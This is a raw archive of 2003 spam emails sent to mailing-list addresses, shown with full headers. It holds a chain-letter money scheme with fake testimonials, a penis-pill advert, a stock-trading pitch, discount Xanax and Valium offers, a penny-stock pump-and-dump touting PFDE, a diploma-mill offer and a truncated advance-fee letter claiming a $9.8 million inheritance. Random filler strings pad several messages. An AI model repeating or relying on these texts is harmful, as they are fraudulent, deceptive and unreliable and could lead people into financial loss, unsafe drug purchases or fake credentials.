<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Dan Sondstrom,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Alberta, Canada</fo=
nt></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"I had receive=
d
this program before. I deleted it, but later I wondered if I should have
given it a try. Of course, I had no idea who to contact to get another
copy, so I had to wait until I was e-mailed again by someone else........1=
1
months passed then it luckily came again...... I did not delete this one!
I made more than $490,000 on my first try and all the money came within
22 weeks".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Susan De Suza,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">New York, N.Y.</fon=
t></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"It really is =
a
great opportunity to make relatively easy money with little cost to you.
I followed the simple instructions carefully and within 10 days the money
started to come in. My first month I made $ 20,560.00 and by the end of
third month my total cash count was $ 362,840.00. Life is beautiful, Thanx=

to the internet".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Fred Dellaca,</font>=
</font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Westport, New Zeala=
nd</font></font></i></b></blockquote>

<hr width=3D"85%"></blockquote>

<center><b><font face=3D"Arial"><font size=3D+0>ORDER YOUR REPORTS TODAY, =
GET
STARTED ON YOUR ROAD TO</font></font></b>
<p><b><font face=3D"Arial"><font size=3D+2>FINANCIAL FREEDOM!</font></font=
></b></center>
</blockquote>

<center><i><font face=3D"Arial"><font size=3D-1>If you have any questions =
as
to the legality of this program, contact the Office of</font></font></i>
<br><i><font face=3D"Arial"><font size=3D-1>Associate Director for Marketi=
ng
Practices, Bureau of Consumer Protection, Washington, D.C</font>.</font></=
i>
<p>&nbsp;</center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>This =
message
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://203.95.1.160/remov=
e.html">remove
link here</a></font></font></font></center>

<div class=3D"ItalicBold"></div>

</body>
</html>
ngwrymxhvp ss
kpux
licwhg  ezl bsemh fgtw

--CC_C_B6_.2_E.6B4BEFB--


From btaylor2@gte.net Fri Oct 24 07:07:57 2003
Return-Path: <btaylor2@gte.net>
Received: from DIS-PARIS-NOT1 ([213.223.37.252])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9OB7uRY026214
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 24 Oct 2003 07:07:56 -0400 (EDT)
Message-Id: <200310241107.h9OB7uRY026214@netlib2.cs.utk.edu>
From: "badvanced@gte.net" <btaylor2@gte.net>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: herbal pill will actually ENLARGE your penis up to 30%
Date: Fri, 24 Oct 2003 13:09:25 +0200
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQoNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+bmE8L3RpdGxlPg0KPC9oZWFkPg0KPGJv
ZHkgdG9wbWFyZ2luPSIwIiBiZ2NvbG9yPSIjMzMwMENDIj4NCjxkaXYgYWxpZ249ImNlbnRlciI+
PGJyPjxzbWo4aTlqZmRzYT4NCjx0YWJsZSB3aWR0aD01MDBweD4NCjx0cj4NCjx0ZCBiZ2NvbG9y
PSJuYXZ5IiBhbGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJ2ZXJkYW5hIiBzaXplPTIgY29sb3I9
InllbGxvdyI+MTAwJSBHdWFyYW50ZWVkIFJlc3VsdHMgT3IgWW91ciBNb25leSBCYWNrDQo8L3Ry
Pg0KPHRyPjx0ZCBiZ2NvbG9yPSJibHVlIiBhbGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJ2ZXJk
YW5hIiBzaXplPTQgY29sb3I9IndoaXRlIj48Yj4NCjxicj4NCkxpa2UgZ2lybHMgd2l0aCBiaWcg
dGl0cz8gR2lybHMgbGlrZSBiaWcgY29ja3Mgb24gZ3V5cyE8YnI+PGJyPg0KPCEtLSBzbWo4aTlq
ZmRzYSAtLT4NClRydXN0IG1lLCBnZXR0aW5nIGNvbXBsaW1lbnRzIGFib3V0IHlvdXIgYmFpdCBh
bmQgdGFja2xlIGlzIGEgYmlnIGNvbmZpZGVuY2UgYm9vc3QhPGJyPjxicj4NCldlJ3ZlIGJlZW4g
c2VsbGluZyBwZW5pcyBwaWxscyBmb3IgYSBsb25nIHRpbWUgYW5kIGhhdmUgc2V2ZXJhbCBtaWxs
aW9uIEhBUFBZIGN1c3RvbWVycyEgPGJyPjxicj4NCjxBIGhyZWY9Imh0dHA6Ly9zY290dHlAd3d3
LmhlcmJhbC11c2EudXMvd2hpdGVsaW5lL3ZwLz9zbWo4aTlqZmRzYSI+PGZvbnQgY29sb3I9Inll
bGxvdyI+VGFrZSBhIGxvb2sgYXQgaG93IGl0IHdvcmtzPC9hPjxicj48YnI+DQo8L3RkPjwvdHI+
DQo8dHI+DQo8dGQgYmdjb2xvcj0ibmF2eSIgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0idmVy
ZGFuYSIgc2l6ZT0yIGNvbG9yPSJ5ZWxsb3ciPldvcmxkcyBNb3N0IEVmZmVjdGl2ZSBFbmxhcmdl
bWVudCBUZWNobmlxdWUNCjwvdHI+DQo8L3RhYmxlPjxzbWo4aTlqZmRzYT4NCjxicj48YnI+PGJy
Pjxicj48YnI+PGJyPjxicj48YnI+DQo8Zm9udCBzaXplPSIxcHgiIGZhY2U9InZlcmRhbmEiIGNv
bG9yPSIjMDAwMDAiPnNtajhpOWpmZHNhIHNtajhpOWpmZHNhIHNtajhpOWpmZHNhPC9mb250Pg0K
PHNtajhpOWpmZHNhPg0KPGEgaHJlZj0iaHR0cDovL3Njb3R0eUB3d3cuaGVyYmFsLXVzYS51cy93
aGl0ZWxpbmUvb3V0Lmh0bWwiPjxmb250IGNvbG9yPSJ5ZWxsb3ciIHNpemU9IjIiPnRvIGdldCBv
ZmY8L2E+DQo8L2JvZHk+DQo8L2h0bWw+DQo=


From m782ghyyw@yahoo.com Sun Oct 26 15:14:03 2003
Return-Path: <m782ghyyw@yahoo.com>
Received: from midsouth-24-151-195-154.westtn.chartertn.net (midsouth-24-151-195-154.westtn.chartertn.net [24.151.195.154])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9QKDqRY001154;
	Sun, 26 Oct 2003 15:13:58 -0500 (EST)
Received: from [14.94.199.127] by midsouth-24-151-195-154.westtn.chartertn.net with ESMTP id 02490370 for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 26 Oct 2003 22:05:57 +0200
Message-ID: <l-6$3$yv-54--8z$8df914t-9on3x@c9up9>
From: "Donn Lund" <m782ghyyw@yahoo.com>
Reply-To: "Donn Lund" <m782ghyyw@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: INVESTORS: Blue-Chip, Stock-Trading System---77% Return---Automated...elliot
Date: Sun, 26 Oct 2003 22:05:57 +0200
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="6562B__CB6__C39_"
X-Priority: 3


--6562B__CB6__C39_
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Investors: Come see Wall Streets only scale-trading system for blue-chip s=
tocks - MainScale

We DO NOT TOUT INDIVIDUAL STOCKS - This is an automated, stock-trading sys=
tem for blue-chips only


www.mainscale4u.com/?032335


MainScale started on October 1, 2002

Here are the results our investors have enjoyed over the last year.

Banked return, 1-year: 77.98%

12 consecutive months of profitability

Trades---467
Gainers--442
Losers----15


www.mainscale4u.com/?032335


In fact, the longest period between profitable trades was just 6 days.

In less than 15 minutes a day, you can manage a profitable portfolio that =
will make you money in any type of market.



www.mainscale4u.com/?032335




No more advertisements, go here: www.mainscale4u.com/nomore.html=
f mbsw ai
bixaq qks
lomr
sns

--6562B__CB6__C39_--


From xgdoakev@cs.com Tue Oct 28 16:15:30 2003
Return-Path: <xgdoakev@cs.com>
Received: from 200-103-106-226.pvoce7001.e.brasiltelecom.net.br (200-103-106-226.pvoce7001.e.brasiltelecom.net.br [200.103.106.226])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9SLFNRY009298;
	Tue, 28 Oct 2003 16:15:25 -0500 (EST)
Received: from n9i3.mrp5q.net [119.120.84.115] by 200-103-106-226.pvoce7001.e.brasiltelecom.net.br id <6969758-82766> for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 28 Oct 2003 20:08:28 -0100
Message-ID: <u0eq$786-6rx4-$z4845srr9k5-1$n2@1ldmbin5mp5>
From: "Kathryn Bullard" <xgdoakev@cs.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Fired Your Boss Now
Date: Tue, 28 Oct 03 20:08:28 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".F_0F8C.9..BAF"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

--.F_0F8C.9..BAF
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

FREE Money-Making Report:

"Why I Quit My Job When I Was
Making $656,305.14 Per Year"

You, too, can fire your boss
and secure true time/financial
freedom. Go to:

http://www.updatebots.com/whyiquitmyjob.html


Click Here to Unsubscribe:
http://updatebots.com/whyiquitmyjob-r.html

--.F_0F8C.9..BAF--


From fdpfhws@yahoo.com Tue Oct 28 16:30:08 2003
Return-Path: <fdpfhws@yahoo.com>
Received: from 12-253-43-247.client.attbi.com (12-253-43-247.client.attbi.com [12.253.43.247])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9SLU3RY009620;
	Tue, 28 Oct 2003 16:30:05 -0500 (EST)
Received: from [193.81.175.215] by 12-253-43-247.client.attbi.com with ESMTP id ABDF90F3F10; Tue, 28 Oct 2003 16:31:09 -0200
Message-ID: <2-7-g-u977295l@fcx0s6r6>
From: "Benny Best" <fdpfhws@yahoo.com>
Reply-To: "Benny Best" <fdpfhws@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: FW: Give Your Partner your bestmoscow hwch zowhyacnetdt
Date: Tue, 28 Oct 03 16:31:09 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="7__B5.9EA_C"
X-Priority: 3
X-MSMail-Priority: Normal


--7__B5.9EA_C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
</HEAD>
<DIV><FONT face=3DArial size=3D2><FONT face=3D"Times New Roman" size=3D3><=
/FONT>
<P><FONT face=3DArial size=3D2><B><FONT face=3DArial size=3D4><FONT
color=3D=
#ff0000>Sa.ve 
70%</FONT> on hundreds of MEDS</FONT></B></FONT></P>
<P>Xanax<BR>Valium<BR>Levitra<BR>Via.graST<BR>Alprazolam (Generic Xanax)<B=
R>Soma 
(Carisoprodol)<BR>Fioricet (generic)<BR>Diazepam (Generic Valium)</P>
<P><FONT face=3DArial size=3D2><A 
href=3D"http://www.poihfrer.biz/vpr6653">Interested</A></FONT></P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P></FONT></DIV></HTML>pc tnq
 hwbnecit hs
iplowivylp wybkgfdxxmjzfxavbtx
gkeokmkvvwvcvs
m

--7__B5.9EA_C--


From htqyljrsd2@yahoo.com Tue Oct 28 18:37:39 2003
Return-Path: <htqyljrsd2@yahoo.com>
Received: from rdu57-192-149.nc.rr.com (rdu57-192-149.nc.rr.com [66.57.192.149])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9SNbZRY012375
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 28 Oct 2003 18:37:36 -0500 (EST)
Received: from [25.211.63.215] by rdu57-192-149.nc.rr.com; Tue, 28 Oct 2003 20:36:39 -0300
Message-ID: <q1--ig1awf7ufx$dw@cwo9.0dx>
From: "Leslie Lockwood" <htqyljrsd2@yahoo.com>
Reply-To: "Leslie Lockwood" <htqyljrsd2@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: US Stock Market: PFDE - Last Picks .45 to 1.18....74 to 1.20...ivi
Date: Tue, 28 Oct 2003 20:36:39 -0300
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="3_44D1_92."
X-Priority: 3


--3_44D1_92.
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

UPSIDE INTERNATIONAL - Searching Out Stocks with Big Upside Potential...th=
at have gone unnoticed until now.


UpSide International uncovers unusual trends and activity in stocks.  We l=
ook for signs of block trades and insider purchasing in order to uncover i=
nsight into uncommon trends.

Seven weeks ago, on Sept. 4th, we highlighted SUQU at 0.57. We set the tar=
get price at 1.20.  It hit a high of 1.18--we were very close. Our last pi=
ck was TRHL at 0.74 on Oct. 3rd.  Target was 1.13.  It hit 1.20.

Our focus now is on Paramco Financial: PFDE

New trading range (as of 10/28/03): Target -- 2.36.

Yesterday, a Long White Candlestick formed, and pressure was strong. The s=
tock is in position for a higher high and a higher low. Last week, a bulli=
sh gap occurred, which indicates an upward break out is imminent. The volu=
me is very high. Also,  PFDE just started an unusual trading pattern.  Lar=
ge blocks of shares are being bought.  Is this an indication of something?=
 Are large investors picking up PFDE, an institution, what's coming?

We have been seeing indicators with PFDE, the 20 - 50 Day MACD Oscillator =
is now indicating an uptrend, 20 Day Bollinger Bands have moved into an up=
grade indication.

Paramco Financial, founded in 1996, is a financial services holding compan=
y which specializes in the development and placement of commercial equipme=
nt leasing transactions and in assisting its clients with their capital fo=
rmation needs.

In 2001, Paramco began a major vertical expansion effort to enter into the=
 residential and commercial mort.gage industry, the mort.gage warehouse le=
nding business and the business of real estate investments through Paramco=
 Mort.gage Corporation and Paramco Investments, Inc.


RECENT NEWS
Paramco Financial Acquires Royal Federal - a company in highly profitable =
sector of mort.gage industry.

DENVER - (PRIMEZONE) -- Paramco Financial, Inc. (OTC BB:PFDE.OB - News), a=
 corporate financial services firm announced today that it has acquired al=
l of the issued and outstanding shares of Royal Federal, Inc., a New Orlea=
ns-based mort.gage company.

According to Douglas G. Gregg, Chairman and CEO of Paramco Financial, ``Th=
is strategic acquisition allows Paramco the unique possibility to deliver =
financial products that will finally fulfill the needs of the Louisiana an=
d Mississippi sub prime markets. This market consists of eager home seeker=
s who have a great deal of difficulty in purchasing a home for a variety o=
f financial reasons. Often the annual incomes of these prospective owners =
are not quite sufficient to meet the criteria of conventional lenders, or =
the clients are unable to afford the very large down payments required. Al=
so, the sub prime clients cannot live with the high rates that they are us=
ually offered. This acquisition we designed to address these particular pr=
oblems and I feel confident this merger will strengthen our bottom line wi=
th not only residential lending business but with the origination of comme=
rcial mort.gages and other types of client financing.''
































gmq why
kcvkbwicxbyymhveoohazqym gfj   f ztzjrr xxlm
 tolyvf nmwi sldefpkyf

--3_44D1_92.--


From tffc160utv@yahoo.com Wed Oct 29 02:16:52 2003
Return-Path: <tffc160utv@yahoo.com>
Received: from 160.36.58.108 ([61.11.13.240])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9T7GkRY019728
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 29 Oct 2003 02:16:49 -0500 (EST)
Message-ID: <3bkft02i63bx49757e4fb61pc7oejc@batrllw.lq>
From: "Rick Bailey" <tffc160utv@yahoo.com>
Reply-To: "Rick Bailey" <tffc160utv@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Get A Bachelor's Degree, Master's, or PhD - Classes Not Needed...javier
Date: Wed, 29 Oct 2003 08:20:34 +0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="4FEBEE0480__1D"


--4FEBEE0480__1D
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Academic Qualifications available from prestigious NON=96ACCREDITTED unive=
rsities.

Do you have the knowledge and the experience but lack the qualifications?

Are you getting turned down time and time again for the job of your dreams=
 because you just don't have the right letters after your name?

Get the prestige that you deserve today!

Move ahead in your career today!

Bachelors, Masters and PhD's available in your field!

No examinations! No classes! No textbooks!


Call to register and receive your qualifications within days!

24 hours a day 7 days a week!




203-286-2187 - USA




























gk nckj
gm hftxiufeuno aucau okwycwdd 
u

--4FEBEE0480__1D--


From abubakar_savimbi@libero.it Wed Oct 29 05:16:42 2003
Return-Path: <abubakar_savimbi@libero.it>
Received: from smtp0.libero.it (smtp0.libero.it [193.70.192.33])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h9TAGgRY026391;
	Wed, 29 Oct 2003 05:16:42 -0500 (EST)
Received: from libero.it (193.70.192.56) by smtp0.libero.it (7.0.020-DD01)
        id 3F6F1CE3004447F3; Wed, 29 Oct 2003 11:09:29 +0100
Date: Wed, 29 Oct 2003 11:09:29 +0100
Message-Id: <HNIK7T$85CD2DF4A08821FF5C903C49BB4B88B2@libero.it>
Subject: from abubakar
MIME-Version: 1.0
X-Sensitivity: 3
Content-Type: text/plain; charset=iso-8859-1
From: "abubakar_savimbi" <abubakar_savimbi@libero.it>
To: "abubakar_savimbi" <abubakar_savimbi@libero.it>
X-XaM3-API-Version: 4.1 (B16)
X-type: 0
X-SenderIP: 213.136.125.94
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by netlib2.cs.utk.edu id h9TAGgRY026391



> 
> > 
> > PLEASE THIS IS WHAT WE NEED FROM YOU.
> > 
> > ATTN:
> > 
> > please I am Mr Abubakar Savimbi, the only son of late
> > chief Joseph Savimbi from Sierra Leone.I know that my
> > message will come to you as a surprise to you but
> > however, 
> > 
> > I am writing you inabsolute confidence primarily to
> > seek your assistance to transfer our cash of nine
> > million eight hundred thousand dollars ($9,800,000)
> > now in the custody of a BANK here in Abidjan to your
> > private account pending our arrival to your country
> > SOURCE OF THE MONEY My late father, 
> > 
> > 
> > chief Joseph Savimbi, a native of mende district in the
> > Northern province of Sierra Leone, was the general
> > Manager of Sierra Leone mining co-operation (S.L.M.C.)
> > Freetown. According to my father. This money was the
> > income acquired from mining co-operation's over draft
> > and minor sales. 
> > 
> > 
> > Before the peak of the civil war between the rebels
> > forces of major Paul Koroma and the combined forces of
> > ECOMOG peace keeping operation that almost destroyed
> > my country, following the forceful removal from power
> > ofthe Civilian Elected President Ahmed Tejan Kabbah by
> > the rebels. 
> > 
> > 
> > My father had already made arrangement for his family,
> > my mother, my little sister and myselfto be evacuated
> > to Abidjan, Cote d'Ivoire with our personal effects
> > and the box containing team.
> > 
> > 
> > My father deposited the fund for the safe custody
> > until after the war when he will join us. During the
> > war in my country, and following the indiscriminate
> > looting of public and Government properties by the
> > rebel forces, the sierra Leone mining coop. 
> > 
> > 
> > Was one of the targets looted and destroyed.My
> > father including other top Governmentfunctionaries
> > Were attacked and killed by the rebels in November1999
> > because of his relationship with the civilian 
> > Government of Ahmed Tejan Kabbah. As a result of my
> > father death, and with the news of my uncles
> > involvement in air crash in January, dashed our hope
> > of survival. 
> > 
> > 
> > The untimely deaths caused my mothers heart failure
> > and other related complications of which she later
> > died in the hospital After we must have spent a lot of
> > money on her.
> > Now my 16-year-old sister and myself are alone in this
> > strange country suffering without any care or
> > help.Without any relation, we are now like refugees
> > and orphans. Our only hope now is in this fund which
> > our father deposited in the BANK To this effect, I
> > humbly solicit your assistance in the followings
> > ways.To assist me claim this fund from the BANK as
> > co-beneficiary.
> > 
> > To transfer this money in your name to your country.To
> > make a good arrangement for a joint business
> > investment on our behalf in your country and you being
> > the caretaker. 
> > 
> > 
> > To secure a college fo